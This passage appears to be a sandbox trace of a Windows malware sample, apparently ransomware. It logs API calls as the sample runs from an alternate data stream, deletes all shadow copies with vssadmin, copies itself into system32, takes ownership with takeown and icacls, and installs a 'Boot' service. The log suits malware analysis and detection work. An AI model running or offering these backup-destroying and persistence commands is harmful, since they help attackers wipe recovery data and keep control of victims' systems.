(HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b848 [0063.484] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x49, lpName=0x18fd58, cchName=0x104 | out: lpName="Video") returned 0x0 [0063.484] lstrlenW (lpString="Video") returned 5 [0063.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x63b868 [0063.484] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4a, lpName=0x18fd58, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0063.484] lstrlenW (lpString="wcncsvc") returned 7 [0063.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x63bfd0 [0063.484] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4b, lpName=0x18fd58, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0063.484] lstrlenW (lpString="Wdf") returned 3 [0063.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b888 [0063.485] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4c, lpName=0x18fd58, cchName=0x104 | out: lpName="WDI") returned 0x0 [0063.485] lstrlenW (lpString="WDI") returned 3 [0063.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b8a8 [0063.485] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4d, lpName=0x18fd58, cchName=0x104 | out: lpName="Windows") returned 0x0 [0063.485] lstrlenW (lpString="Windows") returned 7 [0063.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x63bff8 [0063.485] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4e, lpName=0x18fd58, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0063.485] lstrlenW (lpString="Winlogon") returned 8 [0063.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x63c020 [0063.485] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4f, lpName=0x18fd58, cchName=0x104 | out: lpName="WMI") returned 0x0 [0063.485] lstrlenW (lpString="WMI") returned 3 [0063.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b8c8 [0063.485] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x50, lpName=0x18fd58, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0063.485] lstrlenW (lpString="hivelist") returned 8 [0063.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e) returned 0x63c048 [0063.485] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x51, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0063.485] lstrlenW (lpString="SystemInformation") returned 17 [0063.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x63c070 [0063.486] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x52, lpName=0x18fd58, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0063.486] lstrlenW (lpString="Winresume") returned 9 [0063.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x63c070 [0063.486] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x53, lpName=0x18fd58, cchName=0x104 | out: lpName="winresume") returned 0x103 [0063.486] RegCloseKey (hKey=0xa4) returned 0x0 [0063.486] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot:bin\" -r" [0063.486] StrChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot:bin\" -r", wMatch=0x22) returned="\" -r" [0063.486] StrChrW (lpStart="\" -r", wMatch=0x20) returned=" -r" [0063.486] StrTrimW (in: psz="-r", pszTrimChars=" " | out: psz="-r") returned 0 [0063.486] GetVersion () returned 0x1db10106 [0063.486] GetCurrentProcess () returned 0xffffffff [0063.486] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18ff28 | out: TokenHandle=0x18ff28*=0xa4) returned 1 [0063.487] GetTokenInformation (in: TokenHandle=0xa4, TokenInformationClass=0x14, TokenInformation=0x18ff20, TokenInformationLength=0x4, ReturnLength=0x18ff2c | out: TokenInformation=0x18ff20, ReturnLength=0x18ff2c) returned 1 [0063.487] GetTokenInformation (in: TokenHandle=0xa4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff2c | out: TokenInformation=0x0, ReturnLength=0x18ff2c) returned 0 [0063.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x63b8e8 [0063.487] GetTokenInformation (in: TokenHandle=0xa4, TokenInformationClass=0x19, TokenInformation=0x63b8e8, TokenInformationLength=0x14, ReturnLength=0x18ff2c | out: TokenInformation=0x63b8e8, ReturnLength=0x18ff2c) returned 1 [0063.487] GetSidSubAuthorityCount (pSid=0x63b8f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x63b8f1 [0063.487] GetSidSubAuthority (pSid=0x63b8f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x63b8f8 [0063.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b8e8 | out: hHeap=0x620000) returned 1 [0063.487] CloseHandle (hObject=0xa4) returned 1 [0063.487] lstrlenW (lpString="-r") returned 2 [0063.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6) returned 0x63c4d0 [0063.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63c4e0 [0063.487] lstrlenW (lpString="-r") returned 2 [0063.488] GetWindowsDirectoryW (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0xb [0063.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x220) returned 0x63c4f0 [0063.488] GetWindowsDirectoryW (in: lpBuffer=0x63c4f0, uSize=0xc | out: lpBuffer="C:\\Windows") returned 0xa [0063.488] lstrcpyW (in: lpString1=0x63c506, lpString2="system32" | out: lpString1="system32") returned="system32" [0063.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a) returned 0x63c098 [0063.488] lstrcpyW (in: lpString1=0x63c518, lpString2="Boot" | out: lpString1="Boot") returned="Boot" [0063.488] lstrcatW (in: lpString1="C:\\Windows\\system32\\Boot", lpString2=".exe" | out: lpString1="C:\\Windows\\system32\\Boot.exe") returned="C:\\Windows\\system32\\Boot.exe" [0063.488] PathFileExistsW (pszPath="C:\\Windows\\system32\\Boot.exe") returned 0 [0063.516] lstrlenW (lpString="C:\\Windows\\system32\\Boot.exe") returned 28 [0063.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x240) returned 0x63c718 [0063.517] lstrcpyW (in: lpString1=0x63c740, lpString2="vssadmin.exe Delete Shadows /All /Quiet" | out: lpString1="vssadmin.exe Delete Shadows /All /Quiet") returned="vssadmin.exe Delete Shadows /All /Quiet" [0063.517] GetModuleHandleA (lpModuleName="kernel32") returned 0x76d30000 [0063.517] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x76d5ebe8 [0063.517] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 1 [0063.517] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\vssadmin.exe Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18febc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ff00 | out: lpCommandLine="C:\\Windows\\system32\\vssadmin.exe Delete Shadows /All /Quiet", lpProcessInformation=0x18ff00*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x564, dwThreadId=0x560)) returned 1 [0063.578] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 1 [0063.578] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0177.641] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18ff30 | out: lpExitCode=0x18ff30*=0x0) returned 1 [0177.683] CloseHandle (hObject=0xa4) returned 1 [0177.683] CloseHandle (hObject=0xa8) returned 1 [0177.684] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Boot:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\boot:bin"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0177.685] GetFileSize (in: hFile=0xa8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x106b90 [0177.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x106b92) returned 0x510020 [0177.686] ReadFile (in: hFile=0xa8, lpBuffer=0x510020, nNumberOfBytesToRead=0x106b90, lpNumberOfBytesRead=0x18ff0c, lpOverlapped=0x0 | out: lpBuffer=0x510020*, lpNumberOfBytesRead=0x18ff0c*=0x106b90, lpOverlapped=0x0) returned 1 [0177.722] CloseHandle (hObject=0xa8) returned 1 [0177.738] CreateFileW (lpFileName="C:\\Windows\\system32\\Boot.exe" (normalized: "c:\\windows\\system32\\boot.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0177.827] WriteFile (in: hFile=0xa8, lpBuffer=0x510020*, nNumberOfBytesToWrite=0x106b90, lpNumberOfBytesWritten=0x18ff18, lpOverlapped=0x0 | out: lpBuffer=0x510020*, lpNumberOfBytesWritten=0x18ff18*=0x106b90, lpOverlapped=0x0) returned 1 [0177.852] SetEndOfFile (hFile=0xa8) returned 1 [0177.853] CloseHandle (hObject=0xa8) returned 1 [0177.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x510020 | out: hHeap=0x620000) returned 1 [0177.873] _snwprintf (in: _Dest=0x63c740, _Count=0x120, _Format="takeown.exe /F %s" | out: _Dest="takeown.exe /F C:\\Windows\\system32\\Boot.exe") returned 43 [0177.873] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\system32\\Boot.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18febc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ff00 | out: lpCommandLine="C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\system32\\Boot.exe", lpProcessInformation=0x18ff00*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x748, dwThreadId=0x87c)) returned 1 [0177.889] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0178.317] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0x18ff30 | out: lpExitCode=0x18ff30*=0x0) returned 1 [0178.318] CloseHandle (hObject=0xa8) returned 1 [0178.318] CloseHandle (hObject=0xa4) returned 1 [0178.318] _snwprintf (in: _Dest=0x63c740, _Count=0x120, _Format="icacls.exe %s /reset" | out: _Dest="icacls.exe C:\\Windows\\system32\\Boot.exe /reset") returned 46 [0178.318] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\icacls.exe C:\\Windows\\system32\\Boot.exe /reset", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18febc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ff00 | out: lpCommandLine="C:\\Windows\\system32\\icacls.exe C:\\Windows\\system32\\Boot.exe /reset", lpProcessInformation=0x18ff00*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x904, dwThreadId=0x84c)) returned 1 [0178.330] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0178.584] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18ff30 | out: lpExitCode=0x18ff30*=0x0) returned 1 [0178.584] CloseHandle (hObject=0xa4) returned 1 [0178.584] CloseHandle (hObject=0xa8) returned 1 [0178.584] lstrlenW (lpString="C:\\Windows\\system32\\Boot.exe") returned 28 [0178.584] lstrlenW (lpString="") returned 0 [0178.585] lstrlenW (lpString="-s") returned 2 [0178.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x42) returned 0x63c960 [0178.585] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x2) returned 0x63dd80 [0178.587] CreateServiceW (in: hSCManager=0x63dd80, lpServiceName="Boot", lpDisplayName="Boot", dwDesiredAccess=0xf01ff, dwServiceType=0x10, dwStartType=0x3, dwErrorControl=0x0, lpBinaryPathName="C:\\Windows\\system32\\Boot.exe -s", lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0 | out: lpdwTagId=0x0) returned 0x63c3e0 [0178.643] StartServiceW (hService=0x63c3e0, dwNumServiceArgs=0x0, lpServiceArgVectors=0x0) returned 1 [0181.617] Sleep (dwMilliseconds=0x64) [0181.953] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0181.953] ControlService (in: hService=0x63c3e0, dwControl=0x1, lpServiceStatus=0x18fee8 | out: lpServiceStatus=0x18fee8*(dwServiceType=0x10, dwCurrentState=0x4, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0181.957] Sleep (dwMilliseconds=0x3e8) [0184.496] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0184.497] Sleep (dwMilliseconds=0x3e8) [0185.771] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0185.771] Sleep (dwMilliseconds=0x3e8) [0187.273] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0187.273] Sleep (dwMilliseconds=0x3e8) [0188.409] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0188.410] Sleep (dwMilliseconds=0x3e8) [0189.637] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0189.638] Sleep (dwMilliseconds=0x3e8) [0190.880] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0190.881] Sleep (dwMilliseconds=0x3e8) [0192.127] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0192.128] Sleep (dwMilliseconds=0x3e8) [0193.166] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0193.167] Sleep (dwMilliseconds=0x3e8) [0194.777] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0194.778] Sleep (dwMilliseconds=0x3e8) [0195.917] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0195.918] Sleep (dwMilliseconds=0x3e8) [0196.929] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0196.929] Sleep (dwMilliseconds=0x3e8) [0198.147] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0198.148] Sleep (dwMilliseconds=0x3e8) [0199.201] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0199.201] Sleep (dwMilliseconds=0x3e8) [0200.236] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0200.236] Sleep (dwMilliseconds=0x3e8) [0201.260] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0201.260] Sleep (dwMilliseconds=0x3e8) [0202.267] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0202.268] Sleep (dwMilliseconds=0x3e8) [0203.429] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0203.430] Sleep (dwMilliseconds=0x3e8) [0204.593] QueryServiceStatusEx (in: hService=0x63c3e0, InfoLevel=0x0, lpBuffer=0x18fee8, cbBufSize=0x24, pcbBytesNeeded=0x18ff20 | out: lpBuffer=0x18fee8, pcbBytesNeeded=0x18ff20) returned 1 [0204.593] Sleep (dwMilliseconds=0x3e8) Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x48f75000" os_pid = "0x564" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x76c" cmd_line = "C:\\Windows\\system32\\vssadmin.exe Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x560 Thread: id = 4 os_tid = 0x48c Thread: id = 5 os_tid = 0x7c0 Thread: id = 6 os_tid = 0x7bc Thread: id = 7 os_tid = 0x40c Process: id = "4" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x4831a000" os_pid = "0x774" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005a062" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 8 os_tid = 0x664 Thread: id = 9 os_tid = 0x6c0 Thread: id = 10 os_tid = 0x318 [0074.497] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x103d700 | out: lpSystemTimeAsFileTime=0x103d700*(dwLowDateTime=0x67a52580, dwHighDateTime=0x1d64a6c)) [0074.497] GetCurrentProcessId () returned 0x774 [0074.497] GetCurrentThreadId () returned 0x318 [0074.497] GetTickCount () returned 0x114a989 [0074.497] QueryPerformanceCounter (in: lpPerformanceCount=0x103d708 | out: lpPerformanceCount=0x103d708*=19478763996) returned 1 [0074.497] malloc (_Size=0x100) returned 0x418e80 Thread: id = 11 os_tid = 0x248 Thread: id = 12 os_tid = 0x7c4 Thread: id = 13 os_tid = 0x7ec Thread: id = 14 os_tid = 0x7b4 Thread: id = 29 os_tid = 0x1c0 Thread: id = 37 os_tid = 0x544 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 15 os_tid = 0xb44 Thread: id = 16 os_tid = 0x290 Thread: id = 17 os_tid = 0x768 Thread: id = 18 os_tid = 0x764 Thread: id = 19 os_tid = 0x758 Thread: id = 20 os_tid = 0x724 Thread: id = 21 os_tid = 0x718 Thread: id = 22 os_tid = 0x714 Thread: id = 23 os_tid = 0x630 Thread: id = 24 os_tid = 0x154 Thread: id = 25 os_tid = 0x150 Thread: id = 26 os_tid = 0x120 Thread: id = 27 os_tid = 0x118 Thread: id = 28 os_tid = 0xf0 Thread: id = 36 os_tid = 0x540 Thread: id = 349 os_tid = 0x158 Thread: id = 355 os_tid = 0x52c Thread: id = 356 os_tid = 0x8b0 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x48c20000" os_pid = "0x4fc" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005a3cb" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 30 os_tid = 0x598 Thread: id = 31 os_tid = 0x6f4 Thread: id = 32 os_tid = 0x5cc Thread: id = 33 os_tid = 0x790 Thread: id = 34 os_tid = 0x53c Thread: id = 35 os_tid = 0x490 Thread: id = 38 os_tid = 0xbe8 Process: id = "7" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x38e82000" os_pid = "0x748" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x76c" cmd_line = "C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\system32\\Boot.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 39 os_tid = 0x87c Process: id = "8" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x3a688000" os_pid = "0x904" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x76c" cmd_line = "C:\\Windows\\system32\\icacls.exe C:\\Windows\\system32\\Boot.exe /reset" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 40 os_tid = 0x84c Process: id = "9" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 41 os_tid = 0xb0 Thread: id = 42 os_tid = 0x9dc Thread: id = 43 os_tid = 0x5e4 Thread: id = 44 os_tid = 0x7b4 Thread: id = 45 os_tid = 0x618 Thread: id = 46 os_tid = 0x64 Thread: id = 47 os_tid = 0x344 Thread: id = 48 os_tid = 0x644 Thread: id = 49 os_tid = 0xbf0 Thread: id = 50 os_tid = 